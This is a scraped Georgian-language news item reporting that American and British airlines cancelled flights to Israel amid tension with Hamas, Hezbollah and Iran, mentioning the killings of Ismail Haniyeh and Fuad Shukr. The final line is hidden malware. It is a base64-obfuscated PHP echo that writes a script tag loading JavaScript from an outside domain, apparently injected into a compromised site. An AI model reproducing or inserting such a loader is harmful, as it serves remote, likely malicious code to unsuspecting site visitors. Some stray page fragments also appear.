celsiusi
ავერსი საქკაბელი

ამერიკულმა და ბრიტანულმა ავიაკომპანიებმა ისრაელის მიმართულებით ფრენები გააუქმეს. ინფორმაციას ამის შესახებ timesofisrael ავრცელებს.

როგორც მედია წერს, ისრაელის „ჰამასთან“, „ჰეზბოლასთან“ და ირანთან დაძაბულობის ფონზე ფრენები ბრიტანულმა ავიახაზებმა ორ აგვისტომდე, ხოლო ამერიკულმა 6 აგვისტომდე გააუქმა.

ფრენების გაუქმების გამო ათი ათასამდე ისრაელელი ვერ ახერხებს ქვეყანაში დაბრუნებას.

ცნობისთვის, ახლო აღმოსავლეთში სიტუაცია კვლავ დაძაბულია. გასულ ღამეს ირანის პრეზიდენტის ინაუგურაციის შემდეგ, ისრაელის თავდაცვის ძალებმა „ჰამასის“ პოლიტიკური ბიუროს ხელმძღვანელი ისმაილ ჰანიე მოკლეს. როგორც „ჰამასის“ წარმომადგენლები აცხადებენ, „ისმაილ ჰანიეს ლაჩრული მკვლელობა უპასუხოდ არ დარჩება“.

ამასთან, ისრაელის ბეირუთზე თავდასხმის შედეგად დაიღუპა „ჰესბოლას“ მეთაური ფუად შუქრი.

122
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");